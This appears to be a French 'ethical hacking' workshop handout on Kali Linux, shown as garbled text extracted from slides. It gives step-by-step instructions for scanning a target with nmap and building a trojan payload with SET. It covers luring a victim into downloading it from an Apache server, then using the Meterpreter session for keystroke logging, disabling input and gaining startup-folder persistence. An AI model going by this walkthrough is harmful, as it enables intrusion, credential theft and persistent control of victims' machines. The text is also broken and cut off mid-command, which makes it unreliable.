Atelier kali ATELIER APTECH PIRATAGE ÉTHIQUE LES ÉTAPES DU HACKINGCollecte des informations Analyse du réseau Plani ?er l ? attaque Maintenir la connexion E ?acer les traces Outils de Hacking Kali Ouvrir le terminal Kali Taper Sudo su Entrer le mot de pas

ATELIER APTECH PIRATAGE ÉTHIQUE LES ÉTAPES DU HACKINGCollecte des informations Analyse du réseau Plani ?er l ? attaque Maintenir la connexion E ?acer les traces Outils de Hacking Kali Ouvrir le terminal Kali Taper Sudo su Entrer le mot de passe Taper netdiscover Taper nmap -Pn-v-A Ip address Voir les ports opened Voir le Smb os Discovery Taper Setoolkit ? pour initier un certain nombre d ? attaques Con ?rmer avec y ? Ensuite créer un cheval de Troie pour ouvrir un port d ? accès sur la machine cible Sélectionner Sélectionner Ensuite sélectionner LHOST c ? est l ? adresse de l ? attaquant La machine qui attaque Clique droit dans le terminal avec Split vertically Sur la nouvelle fenêtre de commande taper ifcon ?g ? pour trouver l ? adresse de l ? attaquant L ? introduire dans le Ip adress for the payload listener Introduire un numéro de port L ? importance de network scanning pour voir les ports Entrer Lancer Yes Copier le path sur payload has been exported ? La partie la plus compliquée est de faire exécuter le module par le client Il faut savoir séduire la cible à ouvrir le lien Il faut renommer le ?chier créer pour qu ? il devienne attirant Réduire la fenêtre de l ? invite de commande Clique droit open as root Mot de passe Filesystem root Ouvrir le dossier root ? Ouvrir le dossier set ? Renommer payload exe Retour dans ?lesystem root ? Aller dans var www HTML C Coller dans HTML Démarrer le service o? la cible va ouvrir Exécuter en tant que root sudo su ? Taper dans la seconde fenêtre service apache start ? Veri ?er avec service apache status Véri ?er le active running ? Lancer le navigateur sur la cible et taper l ? adresse IP Kali Suivi de l ? adresse du ?chier payload exe ? Le ?chier payload exe est téléchargé Exécuter le ?chier Mettez côte à côte les fenêtres pour voir les t? ches sur les deux systèmes Une session s ? ouvre sur Kali Meterpreter session opened l ? adresse ip LHOST et celle de la cible avec les ports ouverts Entrer sur l ? attaquant et dans la commande sessions -i ? Dans le Meterpreter ouvert interagir avec la cible Dans la commande Meterpreter taper ce que l ? on veut Exemples keyscanstar lire les mots de passe Puis keyscandump pour voir les di ?érentes données Bloquer la souris uictl disable enable mouse keyboard Redémarrer le client reboot Pour mettre en place la persistance il faut mettre le payload dans le dossier de démarrage sur le client taper shell startup ? après Windows R Copier payload dans le dossier ouvert startup Chi ?rer le message envoyé intercepté Dans Kali taper nano msg ? L ? interface nano msg s ? ouvre Dans le fenêtre écrire coordonnées bancaires nom Justin mot de passe bahatidirokpa ? Control O Control X cut msg ? Pour crypter openssl -enc -aes-

  • 46
  • 0
  • 0
Afficher les détails des licences
Licence et utilisation
Gratuit pour un usage personnel Attribution requise
Partager
  • Détails
  • Publié le Fev 09, 2021
  • Catégorie Administration
  • Langue French
  • Taille du fichier 33.8kB